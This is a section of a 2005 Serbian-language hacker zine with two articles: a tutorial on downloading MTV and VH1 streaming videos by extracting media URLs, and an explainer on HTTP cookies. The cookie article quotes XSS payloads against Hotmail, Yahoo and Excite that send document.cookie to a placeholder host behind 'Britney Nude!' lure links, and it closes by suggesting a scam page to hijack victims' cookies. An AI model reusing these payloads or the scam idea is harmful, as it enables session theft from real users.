                                
                          ...................
                    ...::: phearless zine #4 :::...
                  
..............>---[ Unsorted (tips worth mentioning) ]---<...............

........................>---[ m4rk0, `and ]---<..........................


Ovde se nalaze oni tekstovi koji se ne uklapaju
u profil zine-a ali su ipak vredni citanja....

ToC:

 [unsorted] MTV & Vh1.com - Spots Hacking.............by m4rk0
 [unsorted] Sweeeeeet Cookies.........................by `and

=========================================================================

                      MTV & Vh1.com - Spots Hacking
                                by m4rk0


=> 1. INTRO

=> 2. GRABBING SPOTS FROM VH1.COM

=> 3. GRABBING SPOTS FROM MTV

=> 4. SUMMARY

=> 5. CONCLUSION

- Final words and greetz


///////////////////////////////////////////////////////////////////////////
--==<[ 1. INTRO
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
 
Gornja dva linka vode do sajtova sa najkvalitetnijim i najvecim brojem 
spotova, ali postoji ogroman problem: Moguce je samo "online gledanje 
tih spotova" sto je jedino preporucljivo onima koji imaju konekciju 
vecu od 758 KB/s (da bi gledali bez seckanja) pogotovo sto su spotovi 
pravi dvd ripovi (extra kvalitet), a ne neka kompresovana sranja. 
Ipak postoji jedan hack koji vam omogucava da preko download managera 
skinete kompletan spot na vas HD.

///////////////////////////////////////////////////////////////////////////
--==<[ 2. GRABBING SPOTS FROM VH1.COM
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

Potrebne su vam tri stvari (nijedna druga alternativa ne dolazi u 
obzir !):

-> IE, Notepad i NET Transport

Pa da pocnemo...

U address bar IE-a unesite 

==========================================================================
http://www.vh1.com
==========================================================================
 
i kada vam se kompletno otvori stranica pratite dalja uputstva.
Uzmimo na pr da vrsite pretragu po izvodjacu..i uzecemo kao primer 
Eminem i u tom slucaju link treba da izgleda ovako:


==========================================================================
http://www.vh1.com/artists/az/eminem/artist.jhtml
==========================================================================

Nakon toga cemo kliknuti na odeljak "Video" i link bi trebao da izgleda 
ovako:

==========================================================================
http://www.vh1.com/artists/az/eminem/videos.jhtml
==========================================================================

Od ponudjenih video spotova tog izvodjaca, kliknite na pr na Like 
Toy Soldiers i sacekajte da vam se u potpunosti ucita online media 
player. Kada se ucita online media player, mozete zatvoriti tu stranu. 
Nakon toga idite u History IE-a i tu pronadjite link ka tom online 
media playeru u kome vam je malopre otvoren taj odabran spot i 
kliknite na taj link iz Histoy-a i sacekajte ponovo da vam se ucita 
online player i onda pogledajte "source" te ucitane strane. 
Kada vam se otvori source u nekom txt editoru, vi idite na find opciju i 
potrazite pojam WMV. Verovatno ce vam se na dva mesta javiti taj pojam ali 
vama je potreban onaj u okviru sledeceg linka:

==========================================================================
http://www.vh1.com/sitewide/apps/mediaplayer/asxmaker.jhtml?clipids=1682564
&site_type=music&asx_intro_slate=mms://a1457.v0029d.c534.g.vm.akamaistream.net
/7/1457/534/v001/asmstor.download.akamai.com/9177/asm/vh1/promo/staytunedvh1_416.wmv
==========================================================================

Sada ste dobili link i sada treba da pokrenete Net Transport i da idete na 
opciju "paste url". Samo to uradite i nemojte jos nista dirati. Nakon toga 
u okviru istog prozora kliknite "other settings" (donji desni ugao) i u 
novootvorenom prozoru u okviru opcije "user agent" u padajucem meniju 
izaberite "winampMPEG/ 5.0" i zatim ok. Zatim obratite paznju da ste 
oznacili da vam se samo jedan spot skida, jer ako ste oznacili vise 
verovatno ce se nesto zabrljati.
Kada ste to utvrdili kliknite ponovo OK i pocece download, ali...Net 
transport ce poceti download nekih 4-6 razlicitih stvari (to su ustvari 
neki fajlovi sa /www.vh1.com), ali jedino sto nama treba je muzicki spot 
koji bi trebao da ima naziv Full_416_WMV, a ostale stvari slobodno 
stopirajte /obrisite.

///////////////////////////////////////////////////////////////////////////
--==<[ 3. GRABBING SPOTS FROM MTV
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\


Potrebne su vam tri stvari (nijedna druga alternativa ne dolazi u obzir !):
IE, Notepad i NET Transport
U address bar IE-a unesite 

==========================================================================
http://www.mtv.com 
==========================================================================

i kada vam se kompletno otvori 
stranica pratite dalja uputstva.
U polje search unecemo na primer Satellite by P.O.D i ne dirajte nista i samo 
kliknite na search. U sledecem prozoru kliknite na nesto tipa See All P.O.D. 
Videos i bicete prebaceni na sledeci link

==========================================================================
http://www.mtv.com/bands/az/pod/audvid.jhtml
==========================================================================


E sad, odavde obratite paznju posto se postupak razlikuje u odnosu na 
skidenje spotova sa Vh1.com, koji sam objasnio u gornjem postu.
Obratite paznju ! Umesto da kliknete na video koji zelite da skidate, 
kliknite na onaj koji ne zelite da skidate i to samo na onaj koji nije 
oznacen sa oznakom full length ( to radimo da bi istripovali kukije i da 
bi posle bili u mogucnosti da skidamo upravo onaj spot koji zelimo). Znaci 
kliknete na vido koji ne zelite da skinete i pustite ga da se ucita u 
online player-u i pustite da krene video insert negde do polovine i onda 
stopirajte i slobodno izadjite iz te stranice (posto je to bilo taman 
toliko dovoljno da s odredjeni podatci zabeleze u kukije), ali naravno 
onu glavnu stranicu sa svim spotovima od selektovanog izvodjaca, 
NE ZATVARATE ni jednog trenutka.. Nakon sto ste zatvorili stranicu sa 
online player-om, idite na onu glavnu stranicu sa svim spotovima od 
selektovanog izvodjaca (koja se, jos jednom ponavljam, ne sme zatvarati) 
i pogledajte source te strane. Posto ce vam se source naravno otvoriti u 
nekom txt editoru, vi idite na search i potrazite (u ovom slucaju) 
Satellite (a kada budete trazili neku drugu pesmu vi lepo ukucajte naziv 
te pesme koju trazite) i sibnite enter i mozda cete iz prve da ubodete 
ono sto trazimo, a mozda iz nekog drugog puta, ali bitno je pronaci naziv 
pesme ispred koje se nalazi sledeci pojam


==========================================================================
vid=18316
==========================================================================

e i taj pojam nam upravo treba, selektujte ga i idite na copy (ctrl+c)
Nakon toga zatvorite vas txt editor i idite u history od IE i kliknite na 
link na kome pise 


==========================================================================
MTV.com: Media Player
==========================================================================

posto ste, taj link vec jednom posetili kada vam se otvarao online (media) 
player, zato se i se nasao u History... ZNaci kliknete na to i otvorice vam 
se nova web stranica ponovo sa online media playerom i kada krene da se 
prikazuje neki video isecak vi samo idite na stop i naravno jos uvek ne 
zatvarajte stranicu. 
ta stranica sto vam se upravo otvorila treba da bude na ovom linku


==========================================================================
http://www.mtv.com/sitewide/apps/mediaplayer/index.jhtml?vid=14718&channel
ID=1&orgID=2&gateway=bands&paid=24070&section_0=bands&section_1=az&section
_2=x_ecutioners&section_3=audvid.jhtml&refURL=/bands/az/x_ecutioners/audvid
.jhtml&adPth=/adsetup/bands/&adPN=audvid
==========================================================================

i sa tog linka izbrisite sledeci deo


==========================================================================
&channelID=1&orgID=2&gateway=bands&paid=24070&section_0=bands&section_1=az
&section_2=x_ecutioners&section_3=audvid.jhtml&refURL=/bands/az/x_ecutioners
/audvid.jhtml&adPth=/adsetup/bands/&adPN=audvid
==========================================================================

i dobicete


==========================================================================
http://www.mtv.com/sitewide/apps/mediaplayer/index.jhtml?vid=14718
==========================================================================

U okviru tog linka, umesto tog boldovanog dela, pastujte onaj "pojam" sto 
ste kopirali iz txt editora kad ste gledali source one stranice i kada to 
uradite, link bi trebalo da izgleda ovako:


==========================================================================
http://www.mtv.com/sitewide/apps/mediaplayer/index.jhtml?vid=18316
==========================================================================

I sada kada imate taj link u address baru IE-a, samo sibnite onaj "go" 
button i bicete prebaceni na tranicu sa online media playerom i kao i 
do sada kada se potpuno ucita stranica izvrsite stopiranje iste (naravno 
nemojte i izaci iz nje).U okviru te stranice pogledajte source i potrazite 
pojam swf a da bi znali da ste ga nasli, isti treba da se nadje u sledecem 
obliku


==========================================================================
http://www.mtv.com/sitewide/apps/mediaplayer/asxmaker.jhtml?clipids=1636662
&site_type=music&asx_intro_slate=http://www.mtv.com/sitewide/apps/mediaplayer
/swf/vb_green.swf
==========================================================================

I konacno kad ste dobili taj link, pokrenite NET transport, i zapocnite 
skidanje kao sto sam i objasnio kod skidanja video-a sa vh1.com, a evo 
i c/p toga:
Sada ste dobili link i sada treba da pokrenete Net Transport i da idete 
na opciju "paste url". Samo to uradite i nemojte jos nista dirati. Nakon 
toga u okviru istog prozora kliknite "other settings" (donji desni ugao) 
i u novootvorenom prozoru u okviru opcije "user agent" u padajucem meniju 
izaberite "winampMPEG/ 5.0" i zatim ok. Zatim obratite paznju da ste 
oznacili da vam se samo jedan spot skida, jer ako ste oznacili vise 
verovatno ce se nesto zabrljati.Kada ste to utvrdili kliknite ponovo OK 
i pocece download, ali...Net transport ce poceti download nekih 4-6 
razlicitih stvari (to su ustvari neki fajlovi sa /www.vh1.com), ali jedino 
sto nama treba je muzicki spot koji bi trebao da ima naziv Full_416_WMV, 
a ostale stvari slobodno stopirajte /obrisite.


///////////////////////////////////////////////////////////////////////////
--==<[ 4. SUMMARY
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\


Pre nego sto pustite te video fajlove preporucujem vam da instalirate K-lite 
codec pack


==========================================================================
http://www.free-codecs.com/download/K_Lite_Codec_Pack.htm
==========================================================================

I da jos napomenem, da su skinuti filmovi u malo cudnijem formatu 
kompresovani pa postoji mogucnost da ne mozete da vrsite "premotavanje" 
u vasem player-u, stoga iste konvertujte u neki drugi format (avi na pr), 
a to cete najlakse uraditi pomocu programa DRDivx

Link za download:


==========================================================================
http://www.free-codecs.com/download_soft.php?d=191&s=135
==========================================================================


Kod mene na 2.2 Ghz (512 MB DDR) kompresija traje nekih 10-ak minuta. 
Bitno je samo da u okviru DrDIvx-a izaberete (cekirate) "High def video" 
i samo picite next i kroz nekoliko minuta imacete kristalno cist video spot.
To je sto se tice spotova skinutih sa vh1.com


Video spotovi grebovani sa MTV servera su "drm protected wmv fajlovi" i jos 
ne postoji tool za probijanje te zastite. Tako zasticeni fajlovi se mogu 
pustiti iskljucivo u wmp-u. Da bi mogli pustati tako zasticen fajl u bilo 
kom playeru  potrebno je da uradite sledece. 
Pustite video preko WMP-a i zatim nekim softverom tipa "fraps" izvrsite realtime 
video capture u sirovi AVI (koji je poprilicno velik ) i onda normalno 
kompresujete preko dr divx u neki normalni kompresovani format i time dobijate
odlican spot koji sada mozete pustiti bez problema.


///////////////////////////////////////////////////////////////////////////
--==<[ 5. CONCLUSION
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\


Ovaj tutorijal nije napisan u neke kriminalne svrhe i objasnjava sasvim 
legalan postupak pribavljanja spotova. Nije fer da spotove mogu pregledati 
samo burzoazija sa megabitnim konekcijama, a da iste ne gledaju ljudi koji 
nemaju materjalnih sredstava i uslova za uvodjenje "brzog neta". Stoga sam ja 
ovim tutorijalom jednostavno omogucio i nama obicnim smrtnicima sa slabijim 
net vezama,pregled spotova koji su do skora uzivali samo oni sa dubljim dzepom, 
a najveci broj isih su stranci..




=========================================================================


                            Sweeeeeet Cookies
                                 by `and
                                 

   [.1] Intro
   [.2] Sta su to kolacici ?
   [.3] Kako stvarno rade ?
   [.4] Malo deo o security ...
   [.5] Tip
   [.6] Outro

///////////////////////////////////////////////////////////////////////////
--==<[ 1. Intro
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

Idemo opet, jos malo o nekom malom security problemu ... sada je jbt
2:53 AM 11/5/2005, strasno mi se spava i jos ujutru radim, ma idi bre :)
Nema veze ajde malo da pricamo o kolacima, sta, kako, zasto, ... itd

Ladno vam nista ne treba, i ako vam slicajno nesto zatreba 
kladim se da imate na svom kako bi rekli braca HR sustavu :)
Potrebno vam je samo neko osnovno znanje HTTP-a i to je to !

Ja dok ovo pisem sam na WinXpSp2 ...

///////////////////////////////////////////////////////////////////////////
--==<[ 2. Sta su to kolacici ?
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

Generalno, to je mehanizam koji omogucava razmenu nekih odredjenih podataka
izmedju server-side i client-side u nekoj odredjenoj konekciji. Prilikom razmene 
podataka, tacnije prilikom odgovora na neki HTTP zahtev, server salje podatke 
( txt, slike, ... ) klijentu, ali on takodje moze poslati i posebno oblikovan 
paket podataka sa nekim specificnim parametrima u sebi. Ove pakete nazivamo 
Cookies i oni obicno sadrze podatke koji se ticu klijenta, neke informacije o 
njemu ( ako se radi o nekom logovanju ili sl ) ili neka podesavanja ( ako se radi
o nekoj web aplikaciji i sl ), ili nesto trece, zapravo kolacici mogu sadrzati 
bilo sta u sebi. Svi podaci u kolacicu su zapisano kao stringovi tj oni su 
textualni faljovi.

Potreba za kolacicima nastaje zbog toga sto je HTTP takav protokol kod koga pri
svakom konektovanju na server, mi smo predstavljeni kao da smo prvi put na tom
serveru tj sajtu. To znaci da server "zaboravlja" sve o nama i zbog ovog razloga
se uvode kolacici :)

Sigurno se pitate odakle ime Cookies, ja ne :> al nema veze evo jednog citata
koji to objasnjava :


  According to an article written by Paul Bonner for Builder.Com on 11/18/1997 

"Lou Montulli, currently the protocols manager in Netscape's client product 
division, wrote the cookies specification for Navigator 1.0, the first browser 
to use the technology. Montulli says there's nothing particularly amusing about 
the origin of the name: 'A cookie is a well-known computer science term that is 
used when describing an opaque piece of data held by an intermediary. The term 
fits the usage precisely; it's just not a well-known term outside of computer 
science circles."


Ajde sada malo tehnickih karakteristika ... 
Cookies su fajlovi koji ne prelaze ( tj ograniceni su ) 4KB, zatim Microsoft i
Netscape prema direktivama iz RFC 2109 ne dozvoljavaju da broj Cookies-a prelazi 
300. Tj ako se to desi brise se najstariji colacic.

///////////////////////////////////////////////////////////////////////////
--==<[ 3. Kako stvarno rade ?
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

Da bi ovo malo bolje razumeli moramo koliko toliko poznavati HTTP protokol ali
mislim da ce vam i posle ovog txt-a sve biti jasno !

Struktura kolacica je sledeca :

 - Ime          ( name )
 - Vrednost     ( value )
 - Datum isteka ( expiration date )
 - Putanja ( path ) za koju je kolacic validan
 - Domain za koji je kolacic
 - Potreba za secure connection

Name i\ili Value su obavezni parametri, dok se ostali postavljaju po potrebi.
Svaki parametar je odvojen ; ( tacka-zarez ).

Evo dole primera colacica kada se salje od servera ka browseru, dodaje se prva
linija u HTTP header :

Content-type: text/html
Set-Cookie: pass=lame; path=/; expires Mon, 03-Dec-2005 13:47:00 GMT

I ovde vidimo da se Cookie zove 'pass' i ima vrednost 'lame', vazi za ceo sajt a
to znam po ovome 'path=/' i vidimo kada istice 'Mon, 03-Dec-2005 13:47:00 GMT'.

Kada browser vraca kolacic on je sledeceg oblika :

Content-type: text/html
Cookie: pass=lame

Vrednost colacica moze da bude i NULL ( pass= ), zatim Domain se koristi kada
sajt koristi vise servera pa se treba omuguciti da colacic vazi na svakom npr
'domain=www.myserver.com' i secure connection flag se koristi kada je potrebno
ici preko SSL-a.

Struktura Netscape kolacica je malo drugacija ali sve gore navedeno vazi i za
njih, evo jednog primera :

.netscape.com     TRUE   /  FALSE  946684799   NETSCAPE_ID  110203

Ako gledamo sa leva na desno imamo :

 - Domain 
 - Domain Flag ( Da li se moze ili ne, pristupiti svim serverima )
 - Path
 - Secure
 - Expiration  ( UNIX TIME )
 - Name
 - Value

Evo jednog primera kako napraviti Cookie :

<META HTTP-EQUIV="Set-Cookie"
CONTENT="online=1;expires=Wednesday, 02-Aug-06 21:52:29 GMT; path=/">

Znaci ovde imamo : Name = online, Value = 1, 
                   Expire =  Wednesday, 02-Aug-06 21:52:29 GMT, Path = / .


I sada da malo pogledamo jednu konverzaciju izmedju browsera\klijnta i servera :

Klijent zahteva nesto i dobija :
Set-Cookie: PART_NUMBER=ROCKET_LAUNCHER_0001; path=/

Kada klijent zahteva URL u putanji "/" na serveru on salje :
Cookie: PART_NUMBER=ROCKET_LAUNCHER_0001

I dobija :
Set-Cookie: PART_NUMBER=RIDING_ROCKET_0023; path=/ammo

Kada zahteva neki URL u putanji "/ammo" onda salje :
Cookie: PART_NUMBER=RIDING_ROCKET_0023; PART_NUMBER=ROCKET_LAUNCHER_0001

///////////////////////////////////////////////////////////////////////////
--==<[ 4. Malo deo o security ...
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

Pa do sada smo sigurno zakljucili zasto su kolacici na neki nacin opasni, sigurno
ne zbog toga sto mogu da prepune hard :p, videli smo da su ograniceni na 300 
komada. Vec sbog toga sto mogu da cuvaju informacije koje su od vitalnog znacaja,
uzmimo primer online kupovine. Ulogujemo se na neki sajt koji se bavi nekom 
prodajom i dobijemo colacic u kome se cuva nas ID, indefikacioni broj ili pasword
. Ovo je veoma opasno jer neko moze ukrasti ove kolacice i iskoristiti ih na 
nacin koji se nama nece svideti uopste. Ovo je samo jedan banalan primer, jer ne
cuvaju se bas tako sifre i sl ali samo hocu da vam pokazem koliko colacici mogu
biti opasni. 

Zatim programeri moraju mnogo paziti pri kodiranju web aplikacija, kod kojih je
potrebno ostvarivati sesije izmedju clijenata i servera. Susrecu se par velik
problema :

 - Sesion creation and indefication
   Ovde se postavlje pitanje da li je sesija uopste potrebna i da li clijent ima
   prava da ostvari sesiju ( da li je vec sesija ostvarena ili da li ispunjava
   odredjene uslove ).
 
 - Concurrency issues
   Potreba za rad sa vise klijenata odjednom zahteva i malo vise mozganja oko
   njene realizacije, treba omugucuti simultano opsluzivanje svih klijenata.

 - Session termination and timeout
   Kada colacic istice ? Sta se desava kada klijent pokusava da pristupi sa
   'bajatim' kolacicem' ? Sta se desava kada se pristupa sa razlicitih lokacija
   i istim kolacicima ? ... ?

 - Session data storage, multiple servers, fail-over
   Gde cuvati colacice, sta raditi pri padu servera ?

Znaci cookies su opasni zbog toga sto ih neko moze ukrasti i iskoristiti ih da
dobije neke vitalne informacije, da ih iskoriti za laziranje neke sesije, ili cak
za laziranje tudjih sesija iz "nekog" razloga. Osim fizicke mogucnosti za 
dobijanje kolacica sa neke masine, postoje i velike programerske greske koje se 
mogu exploatisati i preko njih doci da kolacica.

Mnogi veliki web sajtovi su bili komprimitovani bas zbog programerskih greska
koje omugucavaju preuzimanje Cookies-a. Obicno se te rupe exploatisu kroz neki
XSS ili Java script. Evo par ( old ) primera :

HOTMAIL:
- <a href="http://www.accesshollywood.msn.com/news/article.asp?
  art=><script>window.open('http://host/cgi-bin/rompigema.pl?'+
  document.referrer+'%20'+document.cookie);</script>">Britney 
  Nude!</a>

YAHOO:
- <a href="http://login.europe.yahoo.com/config/login?.intl=
  frx%22%20onerror=%22plof:window.open('http://host/cgi-bin/
  rompigema.pl?'%2Bdocument.cookie)%22%3E&.src=ym&.done=">
  Britney Nude!</a>

EXCITE:
- <a href="http://sports.excite.com/jsp/spmywaymaint.jsp?ru=
  X%22><script>window.open('http://host/cgi-bin/rompigema.pl?'
  %252Bdocument.referrer%252B'%20'%252bdocument.cookie);
  </script>">Britney Nude!</a>

ELITESECURITY.ORG
- http://www.elitesecurity.org/korisnik/profil/bla<script>
  javascript:alert(document.cookie);</script>


Ovu su propusti u nekim web aplikacijama, takodje postoje i rupe u browserima
koje omogucavaju dobijanje kolacica. Pogledajte npr ovaj txt :
http://www.westpoint.ltd.uk/advisories/wp-04-0001.txt

///////////////////////////////////////////////////////////////////////////
--==<[ 5. Tip ...
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

I za kraj evo jedne ideje koja mi je pala napamet, napravite vasu stranicu,
koja moze biti scam ili neka vasa koja radi bilo sta, ali u svakom slucaju mora
zainteresovati ljude. I onda imate vise opcija, sjebati tudje kolacice, zatim
raditi request nekih koji nisu vasi i sl ( mozgajte malo ). Ali naravno pre toga
morate znati kako izgleda kolacic doticne zrtve i koji browser koristi ... ma 
ovo je samo ideja, pa vi vidite sta ce te sa njom ...

///////////////////////////////////////////////////////////////////////////
--==<[ 6. Outro ...
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

Ma to je to bre ... 4:49 PM 11/5/2005
Polako ucite jedno po jedno, jos dobijete i neku ideju i super ... a ja samo hocu
da bh rula i moju Lenu samo za sebe da je exploatisem :) 

